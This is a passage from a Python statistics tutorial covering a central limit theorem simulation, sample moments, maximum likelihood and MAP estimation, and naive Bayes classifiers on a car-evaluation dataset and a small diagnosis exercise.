Example 8.13 Verifying the central limit theorem

Let $n$ random variables $X _ {1},X _ {2},…,X _ {n}$ be mutually independent and follow $U\left [a,b\right ]$. Then
$\bar X = \frac{1}{n}\Sigma^{n} _ {k=1}X _ {k}\sim N\left [ \frac{a+b}{2},\frac{(b-a)^2}{12n}\right]$

import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
from scipy import stats

# Enable Chinese characters in the plot
mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
mpl.rcParams["axes.unicode_minus"] = False

f = plt.figure(figsize=(16, 8))
mean, var = 0.5, 1.0 / 12  # mean and variance of the uniform distribution on [0, 1]


def p_norm(nvr):
    """
    Plot the limiting normal density.
    """
    mu = mean
    sigma = np.sqrt(var / nvr)
    norm_dis = stats.norm(mu, sigma)  # the normal distribution object
    norm_x = np.linspace(0, 1, 128)   # the domain
    pdf = norm_dis.pdf(norm_x)        # f(x)
    plt.plot(norm_x, pdf, 'r', alpha=0.6, label='N(${0:.1f}, {1:.2f}^2$)'.format(mu, sigma))
    plt.legend(loc='upper left', prop={'size': 8})


def sample(rv_num):
    """
    Draw one sample of the variable (X1 + X2 + ...) / rv_num.
    :return: the mean of these samples
    """
    single_sample_dist = stats.uniform(loc=0, scale=1)  # uniform distribution on [0, 1]
    x = 0
    for j in range(rv_num):
        x += single_sample_dist.rvs()
    x *= 1 / rv_num
    return x


def plotHist(Sample_num, rv_num, n_):
    """
    Draw the histogram of the mean of rv_num random variables.
    :param Sample_num: number of samples
    :param rv_num: number of random variables
    :param n_: subplot index
    """
    x = np.zeros((Sample_num))
    sp = f.add_subplot(2, 2, n_)
    for i in range(Sample_num):  # draw Sample_num samples
        x[i] = sample(rv_num)
    # Draw the histogram
    plt.hist(x, 500, density=True, color='#348ABD', label='{} random variables'.format(rv_num))
    plt.setp(sp.get_yticklabels(), visible=False)
    # Draw the normal density curve
    p_norm(rv_num)


if __name__ == "__main__":
    Sample_num = 1000
    nvr = ([1, 2, 32, 64])
    for i in range(np.size(nvr)):
        plotHist(Sample_num, nvr[i], i + 1)
    plt.suptitle("The mean of several U[0, 1] random variables approaches a normal distribution")
    plt.show()

(Figure: histograms of the mean of 1, 2, 32 and 64 uniform variables against the limiting normal curves)

8.3 Basic Concepts of Mathematical Statistics

• In probability theory, we study a random variable's regularities under the assumption that its distribution is known; in mathematical statistics the distribution of the random variable under study is unknown

• In mathematical statistics, we repeatedly and independently observe the random variable under study, collect a large amount of data, and analyse it statistically (does the data follow some distribution? what are its characteristics, such as expectation and variance?) in order to draw inferences about the distribution of the random variable

8.4 Common Statistics

Example 8.15 Three ways to compute the mean, variance and standard deviation of a sample

import numpy as np
from math import sqrt

# Generate the sample data
nlist = range(0, 9_000_000)
nlist = [float(i) / 1_000_000 for i in nlist]
N = len(nlist)

(1) By definition

sum1 = 0.0  # sum of the sample values
sum2 = 0.0  # sum of the squared sample values
for i in range(N):
    sum1 += nlist[i]
    sum2 += nlist[i] ** 2
mean = sum1 / N             # mean
var = sum2 / N - mean ** 2  # variance: D(X) = E(X^2) - [E(X)]^2
std = sqrt(var)             # standard deviation = sqrt(variance)

mean, var, std
(4.499999500000001, 6.750000000000028, 2.5980762113533213)

(2) With Numpy vector operations

narray = np.array(nlist)
sum1 = narray.sum()
narray2 = narray * narray  # element-wise square
sum2 = narray2.sum()
mean = sum1 / N
var = sum2 / N - mean ** 2
std = sqrt(var)

mean, var, std
(4.4999994999999995, 6.749999999999915, 2.5980762113532996)

(3) With Numpy functions

mean = np.mean(nlist)
var = np.var(nlist)
std = np.std(nlist)

mean, var, std
(4.4999994999999995, 6.749999999999914, 2.5980762113532996)

8.4 Maximum Likelihood Estimation (MLE)

• Given the observed sample values $x_{1}, x_{2},\dots,x_{n}$, choose the parameter $\theta$ so that the probability of the observed outcome is maximized

• The likelihood function $L(x|\theta)$ is not fixed in advance; $L(x_{1}, x_{2}, \dots, x_{n} | \theta)$ is evaluated on established facts (the model is fixed, the parameter is unknown)

• For a Bernoulli model, the probability of observing $x_{1}, x_{2}, \dots, x_{n}$ is $\prod^{n}_{i=1}\theta^{x_{i}}(1-\theta)^{1-x_{i}}$

• By differentiating with respect to $\theta$ (or similar techniques), find the value of $\theta$ at which $L(x_{1}, x_{2}, \dots, x_{n} | \theta)$ is maximized; a small numerical sketch follows this list

• Reference video: 【概率统计】最大似然估计
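As a tiny numerical illustration (my own sketch, assuming a Bernoulli model and made-up data), the grid maximizer of the log-likelihood matches the closed-form sample mean:

import numpy as np

# Minimal sketch: Bernoulli MLE. For samples x1..xn in {0, 1}, the likelihood
# is prod theta^xi (1-theta)^(1-xi); setting the derivative of the
# log-likelihood to zero gives theta_hat = mean(x).
x = np.array([1, 0, 1, 1, 0, 1, 1, 0])  # assumed data
thetas = np.linspace(0.01, 0.99, 99)
loglik = np.array([np.sum(x * np.log(t) + (1 - x) * np.log(1 - t)) for t in thetas])
print("grid maximizer:", thetas[np.argmax(loglik)])  # ~0.62
print("closed form  :", x.mean())                    # 5/8 = 0.625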

8.5 Maximum A Posteriori Estimation (MAP)

• Adds prior information on top of maximum likelihood estimation; useful when samples are scarce

• $\arg\max \left[{\color{Red}{\ln p(\theta)}} + {\color{Blue}{\sum^{n}_{i=1}\ln p(x_{i}|\theta)}}\right]$: a prior term plus a term equivalent to the MLE objective. Differentiate (or use similar techniques) to find the $\theta$ that maximizes the expression; see the sketch after this list

• Reference video: 极大似然与最大后验的关系-贝叶斯法的视频超分辨率
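A minimal sketch of the idea (my own example, assuming a Bernoulli likelihood with a Beta prior; the closed-form MAP estimator below follows from differentiating the log-posterior):

import numpy as np

# Minimal sketch: MAP for a Bernoulli parameter with a Beta(a, b) prior.
# The log-posterior is ln p(theta) + sum ln p(xi | theta); its maximizer has
# the closed form (k + a - 1) / (n + a + b - 2).
x = np.array([1, 1, 1])          # a tiny assumed sample: 3 successes, 0 failures
a, b = 2.0, 2.0                  # weak prior centered at 0.5
k, n = x.sum(), len(x)

theta_mle = k / n                            # 1.0 (overconfident on 3 points)
theta_map = (k + a - 1) / (n + a + b - 2)    # 4/5 = 0.8, pulled toward the prior
print(theta_mle, theta_map)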

8.6 Worked Example 1: Predicting User Satisfaction with Naive Bayes

1. Problem description

Using an existing car-evaluation satisfaction dataset, we can get a first picture of how satisfied users are with this type of car.

2. Data preparation

| Feature | Values | Meaning |
| --- | --- | --- |
| Buying | vhigh, high, med, low | purchase price |
| Maint | vhigh, high, med, low | maintenance cost |
| Doors | 2, 3, 4, 5more | number of doors |
| Persons | 2, 4, more | passenger capacity |
| Lug-boot | small, med, big | boot size |
| Safety | low, med, high | safety |
import numpy as np
import random
import pandas as pd

# column names = [buying price, maintenance cost, doors, capacity, boot size, safety, class label]
columnsName = ['buying', 'maint', 'doors', 'persons', 'lug-boot', 'safety', 'label']


def getDataSet(file):
    """
    Load the data from the dataset file.
    """
    fr = open(file)
    rdata = []
    for line in fr.readlines():
        tmp = line.strip().split(',')  # the file is comma-separated
        rdata.append(tmp)
    df = pd.DataFrame(rdata)  # read the data into a DataFrame (like a 2-D table)
    df.columns = columnsName  # set the column names
    return df


def getTrainTest(data, trainNum):
    """
    Randomly split the dataset into a training set and a test set.
    :return: training set, test set
    """
    # randomly draw trainNum distinct integers from range(len(data))
    # Syntax: random.sample(sequence, k)
    #   sequence: a list, tuple, string, or set
    #   k: an integer giving the sample size
    # Returns: a new list of k elements chosen from the sequence.
    choose = random.sample(range(len(data)), trainNum)
    choose.sort()
    j = 1
    dftrain = pd.DataFrame(columns=columnsName)
    dftest = pd.DataFrame(columns=columnsName)
    for i in range(1, len(data)):
        # if the row index was drawn, add it to the training set; otherwise to the test set
        if (j < trainNum and i == choose[j]):
            dftrain.loc[dftrain.shape[0]] = data.iloc[i]
            j += 1
        else:
            dftest.loc[dftest.shape[0]] = data.iloc[i]
    return dftrain, dftest

3. Create a class NBClassify implementing the naive Bayes model

4. Define the training function train()

5. Predict on the data

class NBClassify(object):
    """
    A naive Bayes model.
    """
    def __init__(self):
        # _tagProbablity: core dict of class prior probabilities,
        # format: {'unacc': p, 'acc': p, 'vgood': p, 'good': p}
        self._tagProbablity = None
        # _featuresProbablity: core dict of the conditional probability of each
        # feature value per class. Three-level dict, format:
        # {class1: {'feat1': {'val1': p, ... 'valn': p}, 'feat2': {...}}, class2: {...}}
        self._featuresProbablity = None

    def train(self, df):
        """
        4. Training function.
        Compute the class priors and the likelihoods from the training data.
        """
        # value_counts(normalize=True): proportion of each value in the label column
        self._tagProbablity = df['label'].value_counts(normalize=True)
        print("Class priors (proportion of each class):\n", self._tagProbablity)

        # Count the occurrences of each feature value: dictFeaturesBase
        # format: {feat1: {val1: 5, val2: 1}, feat2: {val1: 1, val2: 5}}
        dictFeaturesBase = {}.fromkeys(df.columns)  # create a dict
        for column in df.columns:  # iterate over the columns
            seriesFeature = df[column].value_counts()
            dictFeaturesBase[column] = seriesFeature
        # drop the class column from the feature-value dict
        del dictFeaturesBase['label']

        # Initialize dictFeatures
        # format: {class1: {'feat1': {'val1': None, ... 'valn': None}, 'feat2': {...}}, class2: {...}}
        dictFeatures = {}.fromkeys(df['label'])
        for key in dictFeatures.keys():
            dictFeatures[key] = {}.fromkeys([key for key in dictFeaturesBase])
        for key, value in dictFeatures.items():
            for subkey in value.keys():
                value[subkey] = {}.fromkeys([x for x in dictFeaturesBase[subkey].keys()])
        # Count the occurrences of each (class, feature, value) triple into dictFeatures
        for i in range(0, len(df)):
            label = df.iloc[i]['label']  # df.iloc: integer-position based indexing
            for feature in columnsName[0:6]:  # the corresponding feature
                fvalue = df.iloc[i][feature]  # the feature value of this row
                if dictFeatures[label][feature][fvalue] is None:
                    dictFeatures[label][feature][fvalue] = 1  # first sample with this value for this class
                else:
                    dictFeatures[label][feature][fvalue] += 1  # otherwise increment the count

        # If a feature value never occurs for some class, add a Laplace smoothing term.
        # Laplace smoothing (add-one smoothing) is a common smoothing method; it
        # exists to solve the zero-probability problem and appears often in
        # probability handling for text classification.
        # https://blog.csdn.net/weixin_43868020/article/details/106602799
        for tag, featuresDict in dictFeatures.items():
            for featureName, featureValueDict in featuresDict.items():
                for featureKey, featureValues in featureValueDict.items():
                    if featureValues is None:
                        featureValueDict[featureKey] = 1

        # Turn the counts in dictFeatures into probabilities, i.e. the likelihoods P(feature|tag)
        for tag, featuresDict in dictFeatures.items():
            for featureName, featureValueDict in featuresDict.items():
                totalCount = sum([x for x in featureValueDict.values() if x is not None])
                for featureKey, featureValues in featureValueDict.items():
                    featureValueDict[featureKey] = featureValues / totalCount
        self._featuresProbablity = dictFeatures
        print("Likelihood of each feature value per class:\n", dictFeatures)

    def classify(self, featureTuple):
        """
        Predict the class of one test sample.
        :return: the class with the largest posterior probability
        """
        resultDict = {}
        # compute the posterior probability of each class
        for tag, featuresDict in self._featuresProbablity.items():
            iNumList = []
            i = 0
            # collect the likelihood of each observed feature value into iNumList
            for feature, featureValueDict in featuresDict.items():
                featureValue = str(featureTuple[i])
                iNumList.append(self._featuresProbablity[tag][feature][featureValue])
                i = i + 1
            # multiply the probabilities in iNumList to get the likelihood
            conditionProbability = 1
            for iNum in iNumList:
                conditionProbability *= iNum
            # posterior (up to a constant) = prior * likelihood
            resultDict[tag] = self._tagProbablity[tag] * conditionProbability
        # compare the posterior probabilities in resultDict
        resultList = sorted(resultDict.items(), key=lambda x: x[1], reverse=True)
        # return the class with the largest posterior
        return resultList[0][0]

6. Main program

if __name__ == '__main__':
    dfData = getDataSet('car.txt')
    # To avoid overfitting, use a hold-out split: randomly pick 1500 rows for
    # training and keep the rest for testing.
    # Cross-validation: build the model on most of the samples, predict on the
    # small held-out part, and record the prediction error.
    trainData, testData = getTrainTest(dfData, 1500)
    # create the naive Bayes model
    model = NBClassify()
    # train the model on the training data
    model.train(trainData)
    # predict on the test set and compute the error rate
    errorCount = 0
    for i in range(0, len(testData)):
        result = model.classify(testData.iloc[i][0:6])
        # compare the prediction with the true label
        if testData.iloc[i][6] != result:
            errorCount += 1
    print("Accuracy: %f" % ((float(len(testData)) - float(errorCount)) / len(testData)))
Class priors (proportion of each class):
unacc    0.701134
acc      0.223482
good     0.040027
vgood    0.035357
Name: label, dtype: float64
Likelihood of each feature value per class:
{'unacc': {'buying': {'low': 0.21693625118934348, 'med': 0.22645099904852523, 'vhigh': 0.29590865842055186, 'high': 0.26070409134157946}, 'maint': {'med': 0.23311132254995243, 'vhigh': 0.29971455756422455, 'high': 0.25499524262607043, 'low': 0.21217887725975262}, 'doors': {'4': 0.24262607040913417, '2': 0.26831588962892483, '5more': 0.2407231208372978, '3': 0.2483349191246432}, 'persons': {'4': 0.2597526165556613, '2': 0.47573739295908657, 'more': 0.26450999048525214}, 'lug-boot': {'med': 0.3273073263558516, 'big': 0.3016175071360609, 'small': 0.37107516650808753}, 'safety': {'med': 0.29305423406279735, 'high': 0.2340627973358706, 'low': 0.47288296860133205}},
 'acc': {'buying': {'low': 0.2417910447761194, 'med': 0.2955223880597015, 'vhigh': 0.18507462686567164, 'high': 0.27761194029850744}, 'maint': {'med': 0.3044776119402985, 'vhigh': 0.1791044776119403, 'high': 0.27761194029850744, 'low': 0.23880597014925373}, 'doors': {'4': 0.2716417910447761, '2': 0.21791044776119403, '5more': 0.2626865671641791, '3': 0.24776119402985075}, 'persons': {'4': 0.5238095238095238, '2': 0.002976190476190476, 'more': 0.4732142857142857}, 'lug-boot': {'med': 0.35522388059701493, 'big': 0.382089552238806, 'small': 0.2626865671641791}, 'safety': {'med': 0.4791666666666667, 'high': 0.5178571428571429, 'low': 0.002976190476190476}},
 'vgood': {'buying': {'low': 0.5636363636363636, 'med': 0.4, 'vhigh': 0.01818181818181818, 'high': 0.01818181818181818}, 'maint': {'med': 0.3888888888888889, 'vhigh': 0.018518518518518517, 'high': 0.18518518518518517, 'low': 0.4074074074074074}, 'doors': {'4': 0.32075471698113206, '2': 0.16981132075471697, '5more': 0.3018867924528302, '3': 0.20754716981132076}, 'persons': {'4': 0.4444444444444444, '2': 0.018518518518518517, 'more': 0.5370370370370371}, 'lug-boot': {'med': 0.37037037037037035, 'big': 0.6111111111111112, 'small': 0.018518518518518517}, 'safety': {'med': 0.01818181818181818, 'high': 0.9636363636363636, 'low': 0.01818181818181818}},
 'good': {'buying': {'low': 0.6612903225806451, 'med': 0.3064516129032258, 'vhigh': 0.016129032258064516, 'high': 0.016129032258064516}, 'maint': {'med': 0.3225806451612903, 'vhigh': 0.016129032258064516, 'high': 0.016129032258064516, 'low': 0.6451612903225806}, 'doors': {'4': 0.2833333333333333, '2': 0.23333333333333334, '5more': 0.26666666666666666, '3': 0.21666666666666667}, 'persons': {'4': 0.5081967213114754, '2': 0.01639344262295082, 'more': 0.47540983606557374}, 'lug-boot': {'med': 0.3333333333333333, 'big': 0.35, 'small': 0.31666666666666665}, 'safety': {'med': 0.5409836065573771, 'high': 0.4426229508196721, 'low': 0.01639344262295082}}}
Accuracy: 0.848485

7. Implementing naive Bayes directly with the scikit-learn library

• Scikit-learn is an open-source machine learning library supporting supervised and unsupervised learning. It also provides a variety of tools for model fitting, data preprocessing, model selection and evaluation, and many other utilities.

• It contains 3 naive Bayes classification algorithms:

| Class | Assumption | Suited for |
| --- | --- | --- |
| GaussianNB | the data of each label follow a simple normal distribution | samples whose features are mostly continuous |
| MultinomialNB | features are generated by a simple multinomial distribution | features describing counts or proportions |
| BernoulliNB | feature priors follow a two-valued Bernoulli distribution | binary discrete features, or very sparse multi-valued discrete features |
import pandas as pd
import numpy as np
import random
from sklearn.naive_bayes import BernoulliNB

columnsName = ['buying', 'maint', 'doors', 'persons', 'lug-boot', 'safety', 'label']


def getDataSet(file):
    """
    Load the data from the dataset file and encode it.
    """
    fr = open(file)
    rdata = []
    for line in fr.readlines():
        tmp = line.strip().split(',')
        rdata.append(tmp)
    df = pd.DataFrame(rdata)
    df.columns = columnsName
    # feature_codes: encoding table of the features and the label,
    # e.g. the values of 'buying' are encoded as 'vhigh': 0, 'high': 1, 'med': 2, 'low': 3
    feature_codes = [{'vhigh': 0, 'high': 1, 'med': 2, 'low': 3},
                     {'vhigh': 0, 'high': 1, 'med': 2, 'low': 3},
                     {'2': 0, '3': 1, '4': 2, '5more': 3},
                     {'2': 0, '4': 1, 'more': 2},
                     {'small': 0, 'med': 1, 'big': 2},
                     {'high': 0, 'med': 1, 'low': 2},
                     {'unacc': 0, 'acc': 1, 'good': 2, 'vgood': 3}]
    for i in range(0, 7):
        df.iloc[:, i] = df.iloc[:, i].map(feature_codes[i])
    # Xtrain, Xtest, Ytrain, Ytest = train_test_split(df.iloc[:, 1:6], df.iloc[:, 7], test_size=0.17, random_state=420)
    return df


def getTrainTest(data, trainNum):
    """
    Randomly split the dataset into a training set and a test set.
    """
    # randomly draw trainNum distinct integers from range(len(data))
    choose = random.sample(range(len(data)), trainNum)
    choose.sort()
    j = 1
    dftrain = pd.DataFrame(columns=columnsName)
    dftest = pd.DataFrame(columns=columnsName)
    for i in range(1, len(data)):
        # if the row index was drawn, add it to the training set; otherwise to the test set
        if (j < trainNum and i == choose[j]):
            dftrain.loc[dftrain.shape[0]] = data.iloc[i]
            j += 1
        else:
            dftest.loc[dftest.shape[0]] = data.iloc[i]
    return dftrain, dftest

dfData = getDataSet('car.txt')
dfData
    buying maint doors persons lug-boot safety label
    0 0 0 0 0 0 2 0
    1 0 0 0 0 0 1 0
    2 0 0 0 0 0 0 0
    3 0 0 0 0 1 2 0
    4 0 0 0 0 1 1 0
    ... ... ... ... ... ... ... ...
    1723 3 3 3 2 1 1 2
    1724 3 3 3 2 1 0 3
    1725 3 3 3 2 2 2 0
    1726 3 3 3 2 2 1 2
    1727 3 3 3 2 2 0 3

    1728 rows × 7 columns

# build the training and test sets
trainData, testData = getTrainTest(dfData, 1500)
train_X = trainData.iloc[:, :-1]
train_Y = np.asarray(trainData.iloc[:, -1], dtype="|S6")
test_X = testData.iloc[:, :-1]
test_Y = np.asarray(testData.iloc[:, -1], dtype="|S6")

train_X
    buying maint doors persons lug-boot safety
    0 0 0 0 0 0 1
    1 0 0 0 0 0 0
    2 0 0 0 0 1 1
    3 0 0 0 0 2 2
    4 0 0 0 0 2 1
    ... ... ... ... ... ... ...
    1494 3 3 3 2 1 1
    1495 3 3 3 2 1 0
    1496 3 3 3 2 2 2
    1497 3 3 3 2 2 1
    1498 3 3 3 2 2 0

    1499 rows × 6 columns

train_Y  # labels of the training set
array([b'0', b'0', b'0', ..., b'0', b'2', b'3'], dtype='|S6')
test_X  # inputs of the test set
    buying maint doors persons lug-boot safety
    2 0 0 0 0 1 2
    3 0 0 0 0 1 0
    11 0 0 0 1 1 0
    26 0 0 1 0 1 2
    29 0 0 1 0 2 1
    ... ... ... ... ... ... ...
    1458 3 3 2 0 2 0
    1460 3 3 2 1 0 0
    1465 3 3 2 1 2 0
    1476 3 3 3 0 0 0
    1489 3 3 3 1 2 1

    204 rows × 6 columns

    """
    alpha : 浮点数, 可不填 (默认为 1.0)
    拉普拉斯或利德斯通平滑的参数λ,如果设置为 0 则表示完全没有平滑选项。
    但是需要注意的是,平滑相当于人为给概率加上一些噪音,
    因此λ设置得越大,伯努利朴素贝叶斯的精确性会越低(虽然影响不是非常大),布里尔分数也会逐渐升高。
    binarize : 浮点数或 None,可不填,默认为 0
    将特征二值化的阈值,如果设定为 None,则假定为特征已经被二值化完毕
    fit_prior : 布尔值, 可不填 (默认为 True)
    是否学习先验概率 P(Y=c)。如果设置为 false,则不使用先验概率,而使用统一先验概率(uniform prior),
    即认为每个标签类出现的概率是 1/n_classes
    class_prior:形似数组的结构,结构为(n_classes, ),可不不填(默认为 None)
    """
    clf = BernoulliNB()
    clf.fit(train_X, train_Y) # 训练
    predicted = clf.predict(test_X)
    predicted
    array([b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0',       b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'1',       b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'1', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'1',       b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'1', b'0', b'0', b'0',       b'0', b'1', b'1', b'0', b'0', b'1', b'0', b'0', b'0', b'1', b'0',       b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'1', b'1', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'1', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'1', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'1', b'0', b'1', b'0', b'0', b'0', b'1', b'0', b'1',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'1',       b'1', b'1', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'1', b'1', b'0', b'0', b'0', b'0', b'1', b'0',       b'0', b'0', b'1', b'1', b'0', b'0'], dtype='|S1')
print('Accuracy: %f' % np.mean(predicted == test_Y))
Accuracy: 0.774725

8.7 Worked Example 2: Estimating Model Parameters by Maximum Likelihood

The dataset QQ_data.csv records the number of QQ messages sent each day; use maximum likelihood to estimate the parameter of the population distribution.

(1) Read the dataset "QQ_data.csv" and show how the data are distributed

import pandas as pd
import matplotlib.pyplot as plt

messages = pd.read_csv('QQ_data.csv')  # read the data
fig = plt.figure(figsize=(12, 5))
plt.title('Frequency of QQmessages')
plt.xlabel('Number of QQmessages')
plt.ylabel('Frequency')
plt.hist(messages['numbers'].values, range=[0, 60], bins=60, histtype='stepfilled')  # histogram of the "numbers" column
plt.show()

(Figure: histogram of the daily QQ message counts)

(2) Estimate the parameter $\mu$ by maximum likelihood

Definition of the likelihood function:

$L(x;\mu)=\prod^{n}_{i=1}P(x_{i};\mu)$

For computational convenience, take the logarithm of both sides:

$\ln L(x;\mu)=\sum^{n}_{i=1}\ln P(x_{i};\mu)$

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy
import scipy.stats as stats
import scipy.optimize as opt
import statsmodels.api as sm

messages = pd.read_csv('QQ_data.csv')  # read the data
y_obs = messages['numbers'].values
np.seterr(invalid='ignore')


def poisson_logprob(mu, sign=-1):
    """
    :param mu: parameter of the Poisson model
    :param sign: sign factor
    :return: total log-likelihood of the observed data
    """
    print(" mu: ", mu)
    # stats.poisson.logpmf(y_obs, mu=mu) computes the log-probability of each
    # observation under a Poisson distribution with parameter mu; np.sum then
    # adds them up to get the log-likelihood.
    return np.sum(sign * stats.poisson.logpmf(y_obs, mu=mu))


# opt.minimize_scalar iterates over the parameter mu to find the minimum of the
# objective; since poisson_logprob defaults to sign=-1 (the negated
# log-likelihood), minimizing it maximizes the likelihood.
# https://vimsky.com/examples/usage/python-scipy.optimize.minimize_scalar.html
freq_results = opt.minimize_scalar(poisson_logprob)
print("Estimate of mu: %s" % freq_results['x'])

 mu:  0.0
 mu:  1.0
 mu:  2.6180339999999998
 mu:  5.2360680251559995
 mu:  5.273849359457559
 mu:  5.334980842922849
 mu:  9.032120508519583
 mu:  15.014218190203728
 mu:  14.555935077084984
 mu:  24.69345563048985
 mu:  15.014218190203728
 mu:  18.71135779832006
 mu:  20.996315778882625
 mu:  18.38937216738971
 mu:  18.18406664294854
 mu:  18.217827603959925
 mu:  18.219046315052577
 mu:  18.2189342781152
 mu:  18.218934914073003
 mu:  18.21893518372324
 mu:  18.218934644422767
Estimate of mu: 18.218934644422767

(3) Visualizing how the likelihood function is optimized over $\mu$

x = np.linspace(1, 60)
y_min = np.min([poisson_logprob(i, sign=1) for i in x])
y_max = np.max([poisson_logprob(i, sign=1) for i in x])
# plot the log-likelihood of the dataset as mu varies over [1, 60]
fig = plt.figure(figsize=(6, 4))
plt.plot(x, [poisson_logprob(mu, sign=1) for mu in x])
plt.fill_between(x, [poisson_logprob(mu, sign=1) for mu in x],
                 y_min, color='#348ABD', alpha=0.3)
# dashed red vertical line at the likelihood maximizer
plt.vlines(freq_results['x'], y_max, y_min, colors='red', linestyles='dashed')
plt.scatter(freq_results['x'], y_max, s=110, c='red', zorder=3)
plt.ylim(ymin=y_min, ymax=0)
plt.title('Optimization of $\mu$')
plt.xlabel('$\mu$')
plt.ylabel('Log probability of $\mu$ given data')
plt.show()

(Figure: log-likelihood of the data as a function of $\mu$, with the maximizer marked in red)

(4) Plot the Poisson distribution with the estimated $\mu$

x_lim = 60
mu = int(freq_results['x'])
for i in np.arange(x_lim):
    plt.bar(i, stats.poisson.pmf(i, mu), color='#348ABD')  # bar at k = i with height P{X = i}
plt.xlim(0, x_lim)
plt.ylim(0, 0.1)
plt.title('Estimated Poisson distribution for QQmessages')
plt.xlabel('Number of QQmessages')
plt.ylabel('Probability mass')
plt.legend(['$\mu$ = %s' % mu])
plt.show()

(Figure: the estimated Poisson distribution of the QQ message counts)

8.9 Exercises

(1) Writing a naive Bayes classifier

The data contain 3 classes, {cold, allergy, concussion}; predict the diagnosis of a sneezing construction worker.

By Bayes' theorem:

${\color{Red}{P(A|B)}}={\color{Blue}{P(A)}}{\color{Green}{\frac{P(B|A)}{P(B)}}}$

posterior probability = prior probability * likelihood ratio

Rewritten for the classification task:

$P(\text{class}|\text{features})=P(\text{class})\frac{P(\text{features}|\text{class})}{P(\text{features})}$

So:

$P(\text{allergy}|\text{sneezes},\text{worker})=P(\text{allergy})\frac{P(\text{sneezes}|\text{allergy})\cdot {\color{Red}{P(\text{worker}|\text{allergy})}}}{P(\text{sneezes},\text{worker})}$
$P(\text{cold}|\text{sneezes},\text{worker})=P(\text{cold})\frac{P(\text{sneezes}|\text{cold})\cdot P(\text{worker}|\text{cold})}{P(\text{sneezes},\text{worker})}$
$P(\text{concussion}|\text{sneezes},\text{worker})=P(\text{concussion})\frac{{\color{Red}{P(\text{sneezes}|\text{concussion})}}\cdot P(\text{worker}|\text{concussion})}{P(\text{sneezes},\text{worker})}$

where, expanding by the law of total probability,

$P(\text{sneezes},\text{worker})=P(\text{allergy})P(\text{sneezes}|\text{allergy}){\color{Red}{P(\text{worker}|\text{allergy})}}+$

$P(\text{cold})P(\text{sneezes}|\text{cold})P(\text{worker}|\text{cold})+P(\text{concussion}){\color{Red}{P(\text{sneezes}|\text{concussion})}}P(\text{worker}|\text{concussion})$

and, since the red factors ${\color{Red}{P(\text{worker}|\text{allergy})}}$ and ${\color{Red}{P(\text{sneezes}|\text{concussion})}}$ are both 0 in the data, only the cold term survives:

$=P(\text{cold})P(\text{sneezes}|\text{cold})P(\text{worker}|\text{cold})$

$=\frac{1}{2}\cdot\frac{2}{3}\cdot\frac{1}{3}$

$=\frac{1}{9}$

So the sneezing construction worker is predicted to have a cold; the small computation below reproduces these numbers.
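As a quick check of the derivation (my own sketch, using the six training rows listed in the code that follows):

from fractions import Fraction as F

# Minimal sketch: posterior of each diagnosis for a sneezing construction
# worker, with priors and conditionals counted from the six training rows.
prior = {'cold': F(3, 6), 'allergy': F(1, 6), 'concussion': F(2, 6)}
p_sneeze = {'cold': F(2, 3), 'allergy': F(1, 1), 'concussion': F(0, 1)}
p_worker = {'cold': F(1, 3), 'allergy': F(0, 1), 'concussion': F(1, 2)}

joint = {c: prior[c] * p_sneeze[c] * p_worker[c] for c in prior}
evidence = sum(joint.values())                    # P(sneezes, worker) = 1/9
posterior = {c: joint[c] / evidence for c in joint}
print(evidence, posterior)  # the cold class gets posterior 1: predict a cold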

import numpy as np
import pandas as pd
from sklearn.naive_bayes import BernoulliNB

data = np.array([["护士", "打喷嚏", "感冒"], ["农夫", "打喷嚏", "过敏"], ["建筑工人", "头痛", "脑震荡"],
                 ["建筑工人", "头痛", "感冒"], ["教师", "打喷嚏", "感冒"], ["教师", "头痛", "脑震荡"]])
df = pd.DataFrame(data, columns=["职业", "症状", "类别"])
df
    职业 症状 类别
    0 护士 打喷嚏 感冒
    1 农夫 打喷嚏 过敏
    2 建筑工人 头痛 脑震荡
    3 建筑工人 头痛 感冒
    4 教师 打喷嚏 感冒
    5 教师 头痛 脑震荡
feature_codes = [{'护士': 0, '农夫': 1, '建筑工人': 2, '教师': 3},
                 {'打喷嚏': 0, '头痛': 1},
                 {'感冒': 0, '过敏': 1, '脑震荡': 2}]
for i in range(0, len(df.columns)):
    df.iloc[:, i] = df.iloc[:, i].map(feature_codes[i])
df
    职业 症状 类别
    0 0 0 0
    1 1 0 1
    2 2 1 2
    3 2 1 0
    4 3 0 0
    5 3 1 2
    train_X = df[['职业', '症状']]
    train_Y = df['类别']
    train_X
    职业 症状
    0 0 0
    1 1 0
    2 2 1
    3 2 1
    4 3 0
    5 3 1
test_X = pd.DataFrame(np.array([["2", "0"]]), columns=["职业", "症状"])  # the sneezing construction worker
    test_X
    职业 症状
    0 2 0
    clf = BernoulliNB()
    clf.fit(train_X, train_Y)
    clf.predict(test_X)
    array([0], dtype=int64)

9 Several Distributions of Random Variables

Let's first organize the distributions into tables.

• Discrete:

| Probability mass function | Name | Notation | Expectation $E(X)$ | Variance $D(X)$ | Notes |
| --- | --- | --- | --- | --- | --- |
| $P\{X=0\}=1-p,\ P\{X=1\}=p$ | 0-1 (Bernoulli) distribution | $X\sim B(1,p)$ | $p$ | $p(1-p)$ | the binomial distribution with n = 1, e.g. one coin toss |
